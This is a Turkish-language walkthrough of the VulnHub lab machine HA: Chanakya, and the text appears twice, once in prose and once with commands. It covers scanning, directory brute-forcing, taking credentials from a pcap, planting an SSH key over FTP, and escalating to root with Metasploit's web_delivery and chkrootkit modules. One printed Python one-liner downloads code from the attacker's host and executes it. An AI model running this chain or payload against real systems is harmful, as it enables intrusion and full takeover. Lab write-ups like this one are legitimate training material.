HA: Chanakya Zafiyetli Makine Çözümü
Seviye: Orta Seviye
Görev: Hedef Makineyi Numaralandırmak ve Kök Erişimini Almak.
Makine 9 Kasım 2019da Hacking Articles tarafından yayınlanmıştır.
Kurulum
Yüklemek için siteyi ziyaret edebilirsiniz.
Bağlantı: https://www.vulnhub.com/entry/ha-chanakya,395/
OVA şeklinde hazır olarak kurabilirsiniz.
Örn: Virtual Machine --> File --> Open --> chanakya
Başlayalım.
Çözüm
Öncelikle netdiscover yazarak ağdaki IPleri listeliyoruz.
Daha sonra nmap(network mapping)(ağ haritalandırma) aracı yardımıyla çözeceğimiz makinenin IPsindeki açık portları listeliyoruz.
Buradaki p- parametresi aracın bütün portları (65535) taramasını sağlar.
Buradaki A parametresi ise taramada sürüm, işletim sistemi (OS) tespiti, script taraması ve traceroute belirlenmesini sağlar.
İşletim Sistemi (Operating System (OS))
Script Nedir? (Herhangi bir programlama dilinde yazılmış, uygulama bölümlerinin tüm kodlarını içinde bulunduran hazır kod bloklarına script adı verilir.)
TraceRoute Nedir? (Network TCP/IP içerisinde kullaılan bir sorgulama komutudur. Bu sorgulama komutu ile gönderilen üç paketin hangi ağ geçitlerinden geçtiği takip edilir ve bir paketin uç noktaya hangi yolları izleyerek gittiği görülür.)
Burada nmap 3 tane port buldu. 21(FTP) 22(SSH) 80(HTTP)
Öncelikle HTTP portundan başlayarak siteyi birazcık inceliyoruz. Ancak site üzerinde ne kaynak kodlarında, ne yazılarda ne de resimlerde herhangi bir ipucu bulamadık.
Daha sonra sitelerdeki dizinleri kontrol etmeye karar verdik. Bunu dirb(Web içerik tarayıcısı) isimli araç ile kaba kuvvet saldırısı yaparak sağlayacağız. Dirb, bizim ona vereceğiniz link sözlük bazlı olarak tarayarak bütün içerikleri, linkleri vb. çıkarıp bize listeleyen bir araçtır.
Burada X parametresi belirlenen uzantılara her türlü kelimenin eklenmesini sağlar.
Daha sonra abuse.txt isimli bir dosya buluyor.
(wget internetten komut satırı ile dosya indirmeyi sağlana indirme yöneticisidir.)
Yukarıdaki komut ile dosyayı indiriyoruz.
cat komutu ile de okuyoruz.
Çıktı: nfubxn.cpncat
Anlamlı bir ifade bulamadık. Bu yüzden bunun bir şifre olduğunu düşünüyoruz ve decode etmeyi deniyoruz.
İnternette birazcık nfubxn.cpncatcryptography olarak aradıktan sonra şifrelemenin ROT13 türünde olduğunu gördük ve decode ettik.
Çıktı: ashoka.pcapng
Daha sonra bunun bir WireShark dosyası olduğunu anladık. Wget ile dosyayı indirdik ve wireshark ile dosyayı açtık.
Tcp akışını aşağıdaki kod ile filtrelediğimizde kullanıcı adı ve şifreyi elde ediyoruz.
Tcp.stream
User: ashoka
Pass: kautilya
Daha sonra ftp sunucusuna giriş yapıyoruz.
Elde ettiğimiz kullanıcı adı ve şifreyi giriyoruz.
Daha sonra sunucu da ki dosyaları detaylı şekilde listeliyoruz.
.ssh dosyasının olmadığını görüyoruz ve .ssh dosyasını biz oluşturuyoruz.
Daha sonra ssh-keygen diyerek keyimizi oluşturuyoruz.
Koyacağınız parola herhangi bir şey olabilir. Ör.: tht koyalım.
Daha sonra .ssh dizinini listeliyoruz ve id_rsa.pubı görüyoruz. Oluşturduğumuz anahtarları authorized_keyse aktarıyoruz.
Daha sonra tekrar ftp sunucusuna bağlanıp, oluşturduğumuz anahtarları yüklüyoruz.
Not: Resimde kök dizine yüklemişiz. Normalde .ssh dizinine yüklememiz gerekir aksi halde çalışmayacaktır. Ayrıca .ssh dizinine kolayca yüklemek için authorized_keysi /root/ dizinine taşıyabilirsiniz. Sonra ftp sunucusunda .ssh dizinine gelip put authorized_keys diyerek yükleme işlemini gerçekleştirebilirsiniz.
Şimdi makineye yüklediğimiz sshları kullanarak ashoka olarak giriş yapabileceğiz.
Sahip olduğumuz kabuk ile makinanın içerisinde biraz dolaşıyoruz ve tmp dizininde log dosyası olduğunu fark ediyoruz.
Loglarıinecelediğimizde bunun bir Chkrootkit Test çıktısı olduğunu anlıyoruz.
Rootkit Nedir? (Rootkit yazılımları, saldırganların ele geçirdikleri sisteme daha sonra erişim sağlayabilmelerine imkân sunan zararlı yazılımlardır.)
Chkrootkit nedir? (Bu tür rootkit yazılımlarının sistemdeki varlığını kontrol eden rootkit tespit yazılımları bulunmaktadır. Bunlardan bir tanesi de Chkrootkitdir.)
Artık yetki edinmemiz gerekiyor ve bunu métasploit de web_delivery modülünü kullanarak yapacağız.
web_delivery nedir? (MSF web_delivery istismar modülü, web sunucusu (Kali) üzerinden kurban sistemlere payload göndermek için kullanılır. Bu modül, kurban sistemlerde çalıştırılan bir komut ile web suncusunda kayıtlı olan zararlı yazılım çağırılarak çalıştırılması için kullanılır. Kurban işletim sisteminde kurumlarda ve son kullanıcı bilgisayarlarında en çok kullanılan anti-virüslerden biri yüklü olmasına rağmen Meterpreter bağlantısının elde edilebildiği görülecektir.)
Métasploiti açıyoruz.
Kullacanağımızexploiti ve modülü seçiyoruz.
Kendi makinemizin IP adresini düzenliyoruz.
Ve çalıştırıyoruz.
Burada bizlere yukarıda da açıkladığımız gibi çalıştırmamız gereken komutu da veriyor.
Örn:
Komutu çalıştırıyoruz.
Oturumumuz da geldi.
Oturumumuzu aldıktan sonra makinede root kabuğunu almak için farklı bir exploit kullanıyoruz.
Aşağıdaki gibi düzenliyoruz.
Çalıştırıyoruz.
Daha sonra ls diyerek listeliyoruz ve final.txtyi görüyoruz. Final.txtyi okuyarak makine çözümünü sonlandırıyoruz.
Umarım beğenmişsinizdir. Bence güzel bir zafiyetli makineydi. Teşekkürler.
Seviye: Orta Seviye
Görev: Hedef Makineyi Numaralandırmak ve Kök Erişimini Almak.
Makine 9 Kasım 2019da Hacking Articles tarafından yayınlanmıştır.
Kurulum
Yüklemek için siteyi ziyaret edebilirsiniz.
Bağlantı: https://www.vulnhub.com/entry/ha-chanakya,395/
OVA şeklinde hazır olarak kurabilirsiniz.
Örn: Virtual Machine --> File --> Open --> chanakya
Başlayalım.
Çözüm
Öncelikle netdiscover yazarak ağdaki IPleri listeliyoruz.
Kod:
netdiscover
Buradaki p- parametresi aracın bütün portları (65535) taramasını sağlar.
Buradaki A parametresi ise taramada sürüm, işletim sistemi (OS) tespiti, script taraması ve traceroute belirlenmesini sağlar.
İşletim Sistemi (Operating System (OS))
Script Nedir? (Herhangi bir programlama dilinde yazılmış, uygulama bölümlerinin tüm kodlarını içinde bulunduran hazır kod bloklarına script adı verilir.)
TraceRoute Nedir? (Network TCP/IP içerisinde kullaılan bir sorgulama komutudur. Bu sorgulama komutu ile gönderilen üç paketin hangi ağ geçitlerinden geçtiği takip edilir ve bir paketin uç noktaya hangi yolları izleyerek gittiği görülür.)
Kod:
nmap p- -A IP_ADRESI
Kod:
nmap p- -A 192.168.1.44
Burada nmap 3 tane port buldu. 21(FTP) 22(SSH) 80(HTTP)
Öncelikle HTTP portundan başlayarak siteyi birazcık inceliyoruz. Ancak site üzerinde ne kaynak kodlarında, ne yazılarda ne de resimlerde herhangi bir ipucu bulamadık.
Daha sonra sitelerdeki dizinleri kontrol etmeye karar verdik. Bunu dirb(Web içerik tarayıcısı) isimli araç ile kaba kuvvet saldırısı yaparak sağlayacağız. Dirb, bizim ona vereceğiniz link sözlük bazlı olarak tarayarak bütün içerikleri, linkleri vb. çıkarıp bize listeleyen bir araçtır.
Burada X parametresi belirlenen uzantılara her türlü kelimenin eklenmesini sağlar.
Kod:
dirb [URL="http://192.168.1.10/"]http://192.168.1.44/[/URL] -X .txt
Kod:
wget [URL]http://192.168.1.44/abuse.txt[/URL]
Yukarıdaki komut ile dosyayı indiriyoruz.
cat komutu ile de okuyoruz.
Kod:
cat abuse.txt
Anlamlı bir ifade bulamadık. Bu yüzden bunun bir şifre olduğunu düşünüyoruz ve decode etmeyi deniyoruz.
İnternette birazcık nfubxn.cpncatcryptography olarak aradıktan sonra şifrelemenin ROT13 türünde olduğunu gördük ve decode ettik.
Çıktı: ashoka.pcapng
Daha sonra bunun bir WireShark dosyası olduğunu anladık. Wget ile dosyayı indirdik ve wireshark ile dosyayı açtık.
Kod:
wget [URL]http://192.168.1.44/ashoka.pcapng[/URL]
Kod:
wireshark ashoka.pcapng
Tcp akışını aşağıdaki kod ile filtrelediğimizde kullanıcı adı ve şifreyi elde ediyoruz.
Tcp.stream
User: ashoka
Pass: kautilya
Daha sonra ftp sunucusuna giriş yapıyoruz.
Kod:
ftp 192.168.1.44
Kod:
ashoka
Kod:
kautilya
.ssh dosyasının olmadığını görüyoruz ve .ssh dosyasını biz oluşturuyoruz.
Daha sonra ssh-keygen diyerek keyimizi oluşturuyoruz.
Kod:
ssh-keygen
Kod:
cd .ssh
Kod:
ls
Kod:
cat id_rsa.pub > authorized_keys
Kod:
ls
Daha sonra tekrar ftp sunucusuna bağlanıp, oluşturduğumuz anahtarları yüklüyoruz.
Kod:
ftp 192.168.1.44
Kod:
ashoka
Kod:
kautilya
Kod:
put authorized_keys
Kod:
ls
Not: Resimde kök dizine yüklemişiz. Normalde .ssh dizinine yüklememiz gerekir aksi halde çalışmayacaktır. Ayrıca .ssh dizinine kolayca yüklemek için authorized_keysi /root/ dizinine taşıyabilirsiniz. Sonra ftp sunucusunda .ssh dizinine gelip put authorized_keys diyerek yükleme işlemini gerçekleştirebilirsiniz.
Şimdi makineye yüklediğimiz sshları kullanarak ashoka olarak giriş yapabileceğiz.
Kod:
Kod:
ls /tmp
Kod:
cat /tmp/logs
Loglarıinecelediğimizde bunun bir Chkrootkit Test çıktısı olduğunu anlıyoruz.
Rootkit Nedir? (Rootkit yazılımları, saldırganların ele geçirdikleri sisteme daha sonra erişim sağlayabilmelerine imkân sunan zararlı yazılımlardır.)
Chkrootkit nedir? (Bu tür rootkit yazılımlarının sistemdeki varlığını kontrol eden rootkit tespit yazılımları bulunmaktadır. Bunlardan bir tanesi de Chkrootkitdir.)
Artık yetki edinmemiz gerekiyor ve bunu métasploit de web_delivery modülünü kullanarak yapacağız.
web_delivery nedir? (MSF web_delivery istismar modülü, web sunucusu (Kali) üzerinden kurban sistemlere payload göndermek için kullanılır. Bu modül, kurban sistemlerde çalıştırılan bir komut ile web suncusunda kayıtlı olan zararlı yazılım çağırılarak çalıştırılması için kullanılır. Kurban işletim sisteminde kurumlarda ve son kullanıcı bilgisayarlarında en çok kullanılan anti-virüslerden biri yüklü olmasına rağmen Meterpreter bağlantısının elde edilebildiği görülecektir.)
Métasploiti açıyoruz.
Kod:
msfconsole
Kod:
use exploit/multi/script/web_delivery
Kod:
set lhost 192.168.1.47
Kod:
exploit
Örn:
Kod:
python -c "import sys;import ssl;u=__import__('urllib'+{2:'',3:'.request'}[sys.version_info[0]],fromlist=('urlopen',));r=u.urlopen('http://192.168.1.47:8080/bFQwW5lqU95K98j', context=ssl._create_unverified_context());exec(r.read());"
Komutu çalıştırıyoruz.
Oturumumuz da geldi.
Oturumumuzu aldıktan sonra makinede root kabuğunu almak için farklı bir exploit kullanıyoruz.
Kod:
use exploit/unix/local/chkrootkit
Kod:
set session 1
Kod:
set lport 8888
Kod:
exploit
Daha sonra ls diyerek listeliyoruz ve final.txtyi görüyoruz. Final.txtyi okuyarak makine çözümünü sonlandırıyoruz.
Kod:
ls
Kod:
cat final.txt
Umarım beğenmişsinizdir. Bence güzel bir zafiyetli makineydi. Teşekkürler.
Son düzenleme: